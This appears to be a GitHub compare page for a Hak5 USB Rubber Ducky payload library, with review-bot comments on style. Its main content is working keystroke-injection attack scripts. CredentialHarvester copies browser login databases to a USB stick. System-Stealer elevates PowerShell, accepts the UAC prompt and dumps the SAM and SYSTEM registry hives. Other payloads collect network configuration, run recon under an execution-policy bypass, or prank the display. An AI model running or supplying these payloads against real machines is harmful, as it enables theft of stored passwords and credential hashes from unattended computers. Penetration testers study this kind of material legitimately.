
27 Commits

Author SHA1 Message Date
Mark acc8dd6ea8
Merge f843113663 into 44af31e74b 2024-10-27 11:37:09 +01:00
Peaks 44af31e74b
Merge pull request #481 from mavisinator30001/master
Create Resolution_Prank.txt
2024-10-24 15:30:26 -04:00
Mavis Coffey cacb21ad7e
Removed Second "#DRIVELABEL" variable 2024-10-24 14:58:57 -04:00
Mavis Coffey 61eb88ab6c
Update payload.txt 2024-10-22 14:41:32 -04:00
Mavis Coffey 8be0f9a092
Delete payloads/library/credentials/IP-Out directory 2024-10-21 11:57:10 -04:00
Mavis Coffey 63e0c18618
Create README.md 2024-10-21 11:56:43 -04:00
Mavis Coffey 81807425f5
Create payload.txt 2024-10-21 11:56:10 -04:00
Mavis Coffey 083951025f
Added System-Stealer to exfiltration library 2024-10-18 14:43:32 -04:00
Mavis Coffey 1a5aa0bd08
Update payload.txt 2024-10-18 11:26:00 -04:00
Mavis Coffey a323fc3281
Update payload.txt 2024-10-15 14:10:08 -04:00
Mavis Coffey 420a174f93
Rename readme.md to README.md 2024-09-26 07:42:38 -07:00
Mavis Coffey c8c6a75d33
Rename readme.md to README.md 2024-09-26 07:42:03 -07:00
Mavis Coffey 4e89426355
Create readme.md 2024-09-26 06:29:23 -07:00
Mavis Coffey 566683c428
Update payload.txt 2024-09-26 06:25:51 -07:00
Mavis Coffey 5ed41467e3
Update payload.txt 2024-09-26 06:24:22 -07:00
Mavis Coffey a74d21e848
Create readme.md 2024-09-26 06:16:19 -07:00
Mavis Coffey 0f85a6936e
Update payload.txt 2024-09-26 06:09:19 -07:00
Mavis Coffey d9baab6395
Merge branch 'hak5:master' into master 2024-09-26 09:05:47 -04:00
Mavis Coffey cf0c83d37c
Update and rename Resolution_Prank.txt to payload.txt
Changed author name to my username rather than real name. Changed payload file name to payload.txt
2024-09-20 08:30:00 -07:00
Mavis Coffey 8293bf5d4d
Update payload.txt
Changed author comment to display my username rather than my real name
2024-09-20 08:28:44 -07:00
Mavis Coffey 6ad0b7836c
Create payload.txt
Added IP-Out Ducky payload
2024-09-20 08:25:58 -07:00
mavisinator30001 8073d4d9cd
Create Resolution_Prank.txt
Added Resolution_Prank folder and related payload into said folder
2024-09-18 07:30:59 -07:00
Mark f843113663
Update Payload.txt 2024-05-31 09:31:35 -04:00
Mark 81260982f1
Rename CredentialHarvester.txt to Payload.txt 2024-05-28 23:39:23 -04:00
Mark 582bb6138a
Rename VulnerabilityScanner.txt to Payload.txt 2024-05-28 23:38:47 -04:00
Mark 5b5c57f16b
Create VulnerabilityScanner.txt 2024-05-28 23:38:24 -04:00
Mark ddd7d2af4b
Create CredentialHarvester.txt 2024-05-28 23:34:46 -04:00
7 changed files with 949 additions and 0 deletions


@ -0,0 +1,63 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Title: CredentialHarvester %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Author: github.com/markcyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Description: This script exfiltrates credentials %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Target: Firefox, Chrome, Edge on Windows Machines %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Category: Exfiltration %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM Open PowerShell with elevated privileges
DELAY 1000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1500
REM Check if the USB drive exists
STRING $usbDrive = Get-WmiObject Win32_Volume ^| Where-Object { $_.Label -eq 'MYUSB' } ^| Select-Object -ExpandProperty DriveLetter;
ENTER
DELAY 500
STRING if ($usbDrive -ne $null) {
ENTER
DELAY 500
STRING cd $usbDrive
ENTER
DELAY 500
STRING mkdir BrowserData
ENTER
DELAY 500
STRING cd BrowserData
ENTER
DELAY 500
REM Copy Chrome Login Data to USB
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
ENTER
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData" }
ENTER
DELAY 500
REM Copy Firefox Login Data to USB
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"
ENTER
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData" }
ENTER
DELAY 500
REM Copy Edge Login Data to USB
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"
ENTER
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData" }
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
STRING echo off ^| clip
ENTER
DELAY 500
REM Close PowerShell
STRING exit
ENTER
DELAY 500
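Review bot: The comment at L87, `REM Open PowerShell with elevated privileges`, does not match the keystrokes that follow it: `GUI r`, `powershell`, `ENTER` open an ordinary user-level PowerShell window with no elevation request, so the comment should read `REM Open a (non-elevated) PowerShell window`, or the header should state that the payload runs as the logged-in user. The drive label is also a literal `'MYUSB'` inside the query at L96 and repeated in prose at L84; the other payloads in this compare declare it once with `DEFINE #DRIVELABEL DUCKY` (L158, L258) and substitute the token, which keeps the header, the query and any user edit in one place. The same duplicated-label issue is present in VulnerabilityScanner at L400 and L426.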


@ -0,0 +1,12 @@
# IP-OUT
This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
## Useful Tips
**Change #DRIVELABEL to your own personal drive label if it isn't already**
Remember: Do not use this for unethical hacking practices! This is for educational purposed only!


@ -0,0 +1,63 @@
REM Title: IP-Out
REM Author: Mavisinator30001
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
REM Target: Any Windows System
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
DEFINE #DRIVELABEL DUCKY
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
IF $_OS != WINDOWS
STOP_PAYLOAD
END_IF
ATTACKMODE HID STORAGE
DELAY 500
GUI r
DELAY 300
STRINGLN Powershell
DELAY 1000
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
ALT F4
ATTACKMODE OFF
HIDE_PAYLOAD
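Review bot: The OS guard at L195, `IF $_OS != WINDOWS`, drops the parentheses and `THEN` that every other conditional in this file uses (L184 and L188 are written `IF (...) THEN`); for consistency with the DuckyScript 3 form used elsewhere it should be `IF ($_OS != WINDOWS) THEN`. The same bare form appears at L333 in the Resolution Prank payload. The description at L155 says the payload "prints the current IP", but the command at L204 writes the full `ipconfig` output to `exfil.txt` on the drive labelled `#DRIVELABEL`; the README wording at L145 is the accurate one and the REM should match it, e.g. `REM Description: Opens a PowerShell window and writes the ipconfig output to exfil.txt on the drive labelled #DRIVELABEL`.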


@ -0,0 +1,74 @@
REM TITLE System Stealer
REM AUTHOR mavisinator30001
REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
REM DISCLAIMER This is for educational purposes ONLY
DELAY 1000
ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Change $DRIVELABEL to the storage label of your duck
DEFINE #DRIVELABEL DUCKY
IF ($_OS == WINDOWS) THEN
GUI r
DELAY 500
STRING powershell
DELAY 1000
CTRL-SHIFT-ENTER
DELAY 750
LEFT
ENTER
DELAY 1000
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
DELAY 250
STRINGLN reg save HKLM\sam $DriveLetter/sam.save
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
STRINGLN reg save HKLM\system $DriveLetter/system.save
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
ALT F4
ELSE
ATTACKMODE OFF
STOP_PAYLOAD
END_IF
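Review bot: The comment at L257, `REM Change $DRIVELABEL to the storage label of your duck`, names a `$` variable, but the define on the next line is `#DRIVELABEL`, so a user following the comment looks for the wrong token; it should read `REM Change #DRIVELABEL to the storage label of your duck`. The header at L214-L218 does not state the account prerequisite implied by L264-L267, which appear to request an elevated PowerShell and answer the UAC prompt: the payload can only succeed when the logged-in user is a local administrator, and a `REM TARGET` line saying so (VulnerabilityScanner records the same thing at L398, "Windows machines with admin access") would document it. The description at L216, "encrypted system information", does not describe what `reg save` at L271 and L274 produces; say plainly that it exports the SAM and SYSTEM registry hives to the drive.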


@ -0,0 +1,5 @@
# Resolution Prank
This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
### Somewhat resource dependent, may not work on older computers


@ -0,0 +1,103 @@
REM TITLE Resolution Prank
REM AUTHOR Mavisinator30001
REM TARGET Any system running Windows 10/11
REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
IF $_OS != WINDOWS
STOP_PAYLOAD
END_IF
LED_G
DELAY 500
CTRL GUI d
DELAY 500
GUI i
DELAY 2000
STRINGLN display
DELAY 2500
TAB
ENTER
DELAY 200
REPEAT 8 TAB
ENTER
VAR $CAPS_STATE = $_CAPSLOCK_ON
WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
HOLD DOWN
DELAY 1000
RELEASE DOWN
ENTER
DELAY 200
LEFT
DELAY 200
ENTER
REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
VAR $LIGHT_UP_TIMES = 20
WHILE ($LIGHT_UP_TIMES > 0)
LED_G
DELAY 300
LED_OFF
DELAY 300
LED_R
DELAY 300
LED_OFF
DELAY 300
$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
END_WHILE
WAIT_FOR_CAPS_CHANGE
END_WHILE
DELAY 300
REPEAT 12 TAB
ENTER
DELAY 200
HOLD UP
DELAY 1000
RELEASE UP
ENTER
DELAY 200
LEFT
ENTER
DELAY 1000
ALT F4
DELAY 200
CTRL GUI F4
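Review bot: The `WHILE` at L350 wraps the whole resolution-lowering sequence (L351-L358) together with the LED flash and the `WAIT_FOR_CAPS_CHANGE` at L372, so if Caps Lock is toggled while the payload is still navigating Settings, the wait at L372 returns only after a second toggle, `$_CAPSLOCK_ON` is back at its starting value, and the loop runs the lowering sequence again on a display that is already at its lowest setting. Since the body already blocks on `WAIT_FOR_CAPS_CHANGE`, a straight-line sequence (lower once, flash, `WAIT_FOR_CAPS_CHANGE`, then restore from L374 on) expresses the intent without the loop; that is only deleting L349-L350 and L373, if I read the DuckyScript 3 loop semantics correctly. The description at L296 also reads "Goes into Windows settings and change the screen resolution" and should say "changes".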


@ -0,0 +1,629 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Title: VulnerabilityScanner %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Author: Github.com/MarkCyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Description: This script scans for vulnerabilities %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Target: Windows machines with admin access %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Category: Recon %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
REM Open Start Menu
CONTROL ESCAPE
DELAY 2000
STRING powershell
REM Navigate to the context menu to run PowerShell as an administrator
DELAY 500
RIGHTARROW
DELAY 100
DOWNARROW
DELAY 100
ENTER
DELAY 3000
ALT Y
DELAY 5000
REM Set PowerShell Execution Policy to Bypass
DELAY 1000
STRING set-executionpolicy bypass -scope process -force
DELAY 200
ENTER
DELAY 200
REM Create the PowerShell script in memory and execute it
DELAY 200
STRING $usbName = "MYUSB"
DELAY 200
ENTER
DELAY 200
STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
DELAY 200
ENTER
DELAY 200
STRING if ($usbDrive) {
DELAY 200
ENTER
DELAY 200
STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
DELAY 200
ENTER
DELAY 200
STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
DELAY 200
ENTER
DELAY 200
STRING New-Item -ItemType Directory -Path $directoryPath
DELAY 200
ENTER
DELAY 200
STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
DELAY 200
ENTER
DELAY 200
STRING "" > $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING function check-passwordpolicy {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING net accounts
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking password policy: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function audit-services {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-service | select-object name, displayname, status, starttype
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error auditing services: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-networksettings {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-netipconfiguration
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking network settings: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-softwarevulnerabilities {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking software vulnerabilities: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-cve {
DELAY 200
ENTER
DELAY 200
STRING param (
DELAY 200
ENTER
DELAY 200
STRING [string]$productname,
DELAY 200
ENTER
DELAY 200
STRING [string]$version
DELAY 200
ENTER
DELAY 200
STRING )
DELAY 200
ENTER
DELAY 200
STRING $initialDelay = 2
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds $initialDelay
DELAY 200
ENTER
DELAY 200
STRING $response = invoke-restmethod -uri $uri -method get
DELAY 200
ENTER
DELAY 200
STRING if ($response.totalresults -gt 0) {
DELAY 200
ENTER
DELAY 200
STRING foreach ($cve in $response.result.cve_items) {
DELAY 200
ENTER
DELAY 200
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING "no cves found for $productname $version"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking CVEs: $_"
DELAY 200
ENTER
DELAY 200
STRING if ($_.Exception -match '403') {
DELAY 200
ENTER
DELAY 200
STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds 60
DELAY 200
ENTER
DELAY 200
STRING $retryResponse = invoke-restmethod -uri $uri -method get
DELAY 200
ENTER
DELAY 200
STRING if ($retryResponse.totalresults -gt 0) {
DELAY 200
ENTER
DELAY 200
STRING foreach ($cve in $retryResponse.result.cve_items) {
DELAY 200
ENTER
DELAY 200
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING "no cves found for $productname $version"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function analyze-logs {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-eventlog -logname system -newest 100
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error analyzing logs: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-openports {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING netstat -an
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking open ports: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-missingupdates {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING write-output "Checking Windows Update logs..."
DELAY 200
ENTER
DELAY 200
STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
DELAY 200
ENTER
DELAY 200
STRING Get-WindowsUpdateLog -LogPath $updateLogPath
DELAY 200
ENTER
DELAY 200
STRING write-output "WindowsUpdate.log written to $updateLogPath"
DELAY 200
ENTER
DELAY 200
STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error getting Windows Update log: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-firewallstatus {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING netsh advfirewall show allprofiles
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking firewall status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-smbv1status {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-windowsoptionalfeature -online -featurename smb1protocol
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking SMBv1 status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-antivirusstatus {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-mpcomputerstatus
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking antivirus status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING check-passwordpolicy >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING audit-services >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-networksettings >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-softwarevulnerabilities >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING analyze-logs >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-openports >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-missingupdates >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-firewallstatus >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-smbv1status >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-antivirusstatus >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
REM Dynamically identify critical software from running processes and scheduled tasks
STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
DELAY 200
ENTER
DELAY 200
STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
DELAY 200
ENTER
DELAY 200
REM Combine running software and scheduled tasks
STRING $softwareList = @()
DELAY 200
ENTER
DELAY 200
STRING foreach ($process in $runningSoftware) {
DELAY 200
ENTER
DELAY 200
STRING $softwareList += $process.Name
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING foreach ($task in $scheduledTasks) {
DELAY 200
ENTER
DELAY 200
STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
REM Remove duplicates and empty entries
STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
DELAY 200
ENTER
DELAY 200
REM Check CVEs for identified software
STRING foreach ($software in $softwareList) {
DELAY 200
ENTER
DELAY 200
STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
DELAY 200
ENTER
DELAY 200
STRING if ($version) {
DELAY 200
ENTER
DELAY 200
STRING check-cve -productname $software -version $version >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds $initialDelay
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING write-output "Results saved to USB drive."
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error: USB drive MYUSB not found."
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING invoke-command -scriptblock $script
DELAY 200
ENTER
DELAY 20000
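Review bot: L1018, `STRING invoke-command -scriptblock $script`, refers to a `$script` variable that nothing in the file assigns; every function is defined and already invoked inline at L886-L922, so as far as I can see this line only raises a parameter-binding error for the null `-ScriptBlock` and should be removed, together with the L424 comment "Create the PowerShell script in memory and execute it", which describes a script variable that never exists. `$initialDelay` is first assigned inside `check-cve` at L590, where it is local to the function, so the `+=` at L986 at script scope starts from `$null` and only works by accident; initialise it before the loop at L970 with `$initialDelay = 2`, or keep the accumulator inside the function. The header at L400 was copied from the credential payload and still says the USB is used "to save credentials to", whereas this script writes `results.txt` (L450) and `WindowsUpdate.log` (L770); the line should say scan results. The 403 retry branch at L646-L690 repeats the success handling of L610-L634 line for line; a small helper that prints a response would halve `check-cve`.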